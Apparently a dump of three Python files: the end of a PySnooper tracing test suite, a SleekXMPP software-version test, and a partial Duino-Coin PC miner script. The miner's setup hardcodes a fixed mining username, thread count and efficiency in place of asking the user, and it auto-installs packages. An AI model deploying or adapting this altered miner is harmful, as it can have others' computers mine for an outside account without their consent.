stderr=True) as output_capturer:
result = getattr(module, 'f')(7)
assert result == 7
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage='starting'),
CallEntry('SOURCE IS UNAVAILABLE'),
LineEntry('SOURCE IS UNAVAILABLE'),
ReturnEntry('SOURCE IS UNAVAILABLE'),
ReturnValueEntry('7'),
)
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path))
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith('lala')
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path), overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert 'lala' not in output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
with pytest.raises(Exception, match='can only be used when writing'):
@pysnooper.snoop(overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses('x')
assert not needs_parentheses('x.y')
assert not needs_parentheses('x.y.z')
assert not needs_parentheses('x.y.z[0]')
assert not needs_parentheses('x.y.z[0]()')
assert not needs_parentheses('x.y.z[0]()(3, 4 * 5)')
assert not needs_parentheses('foo(x)')
assert not needs_parentheses('foo(x+y)')
assert not needs_parentheses('(x+y)')
assert not needs_parentheses('[x+1 for x in ()]')
assert needs_parentheses('x + y')
assert needs_parentheses('x * y')
assert needs_parentheses('x and y')
assert needs_parentheses('x if z else y')
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block(normalize):
# Testing that a single Tracer can handle many mixed uses
snoop = pysnooper.snoop(normalize=normalize)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in first call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with pysnooper.snoop(string_io, depth=3, normalize=normalize):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(x1)'),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_cellvars(normalize):
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
return f4(a)
return f3(a)
def f1(a):
with pysnooper.snoop(string_io, depth=4, normalize=normalize):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(a)'),
VariableEntry(),
CallEntry('def f2(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry('def f3(a):'),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry('def f4(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_var_order(normalize):
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with pysnooper.snoop(string_io, depth=2, normalize=normalize):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result = f(1, 2, 3, 4)'),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry('def f(one, two, three, four):'),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
),
normalize=normalize,
)
def test_truncate():
max_length = 20
for i in range(max_length * 2):
string = i * 'a'
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == 'aaaaaaaa...aaaaaaaaa'
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@pysnooper.snoop(string_io)
def f(x1):
assert not original_tracer_active()
x2 = (yield x1)
assert not original_tracer_active()
x3 = 'foo'
assert not original_tracer_active()
x4 = (yield 2)
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send('blabla')
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send('looloo')
assert original_tracer_active()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x1', '0'),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('0'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x2', "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry('x3', "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('2'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x4', "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr(normalize):
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return 'list(size={})'.format(len(l))
def print_dict(d):
return 'dict(keys={})'.format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@pysnooper.snoop(string_io, custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: 'I am evil')),
normalize=normalize,)
def sum_to_x(x):
l = list(range(x))
a = {'1': 1, '2': 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'list(size=10000)'),
LineEntry(),
VariableEntry('a', "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('49995000'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr_single(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, custom_repr=(list, lambda l: 'foofoo!'), normalize=normalize)
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'foofoo!'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
),
normalize=normalize,
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((pysnooper.tracer, 'DISABLED'), True):
tracer = pysnooper.snoop(string_io)
with tracer:
result = my_function('baba')
my_decorated_function = tracer(my_function)
my_decorated_function('booboo')
output = string_io.getvalue()
assert not output
@pytest.mark.parametrize("normalize", (True, False))
def test_class(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('self', value_regex="u?.+MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"\{\}"),
VariableEntry('function', value_regex="u?.+my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method_and_snoop_applied_to_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@pysnooper.snoop(string_io, normalize=normalize)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"u?\{\}"),
VariableEntry('function', value_regex="u?.*my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_property(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self._x = 0'),
ReturnEntry('self._x = 0'),
ReturnValueEntry('None'),
# Called from getter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from setter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from deleter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped(normalize):
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def method_on_child_class(self):'),
LineEntry('self.method_on_base_class()'),
ReturnEntry('self.method_on_base_class()'),
ReturnValueEntry('None'),
),
normalize=normalize,
)
def test_normalize():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py'),
VariableEntry('A', value_regex=r"<class .*\.A.?>"),
CallEntry('def add():'),
LineEntry('a = A(19)'),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('b = A(22)'),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('res = a.a + b.a'),
VariableEntry('res', value="41"),
LineEntry('return res'),
ReturnEntry('return res'),
ReturnValueEntry('41'),
)
)
def test_normalize_prefix():
string_io = io.StringIO()
_prefix = 'ZZZZ'
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, prefix=_prefix)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py', prefix=_prefix),
VariableEntry('A', value_regex=r"<class .*\.A.?>", prefix=_prefix),
CallEntry('def add():', prefix=_prefix),
LineEntry('a = A(19)', prefix=_prefix),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('b = A(22)', prefix=_prefix),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('res = a.a + b.a', prefix=_prefix),
VariableEntry('res', value="41", prefix=_prefix),
LineEntry('return res', prefix=_prefix),
ReturnEntry('return res', prefix=_prefix),
ReturnValueEntry('41', prefix=_prefix),
)
)
def test_normalize_thread_info():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, thread_info=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
with pytest.raises(NotImplementedError):
add()
|
test_stream_xep_0092.py
|
import threading
import unittest
from sleekxmpp.test import SleekTest
class TestStreamSet(SleekTest):
def tearDown(self):
self.stream_close()
def testHandleSoftwareVersionRequest(self):
self.stream_start(mode='client', plugins=['xep_0030', 'xep_0092'])
self.xmpp['xep_0092'].name = 'SleekXMPP'
self.xmpp['xep_0092'].version = 'dev'
self.xmpp['xep_0092'].os = 'Linux'
self.recv("""
<iq type="get" id="1">
<query xmlns="jabber:iq:version" />
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:version">
<name>SleekXMPP</name>
<version>dev</version>
<os>Linux</os>
</query>
</iq>
""")
def testMakeSoftwareVersionRequest(self):
results = []
def query():
r = self.xmpp['xep_0092'].get_version('foo@bar')
results.append((r['software_version']['name'],
r['software_version']['version'],
r['software_version']['os']))
self.stream_start(mode='client', plugins=['xep_0030', 'xep_0092'])
t = threading.Thread(target=query)
t.start()
self.send("""
<iq type="get" id="1" to="foo@bar">
<query xmlns="jabber:iq:version" />
</iq>
""")
self.recv("""
<iq type="result" id="1" from="foo@bar" to="tester@localhost">
<query xmlns="jabber:iq:version">
<name>Foo</name>
<version>1.0</version>
<os>Linux</os>
</query>
</iq>
""")
t.join()
expected = [('Foo', '1.0', 'Linux')]
self.assertEqual(results, expected,
"Did not receive expected results: %s" % results)
suite = unittest.TestLoader().loadTestsFromTestCase(TestStreamSet)
|
pc.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import environ as osenviron
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# disable window title setter when running with nohup
if osenviron.get('_') != '/usr/bin/nohup':
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + " seconds"
elif uptime == 60:
return str(round(uptime // 60)) + " minute"
elif uptime >= 60:
return str(round(uptime // 60)) + " minutes"
elif uptime == 3600:
return str(round(uptime // 3600)) + " hour"
elif uptime >= 3600:
return str(round(uptime // 3600)) + " hours"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = "fereze21"
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = "95"
threadcount = "8"
requested_diff = "2"
rig_identiier = "Hello123"
donation_level = "0"
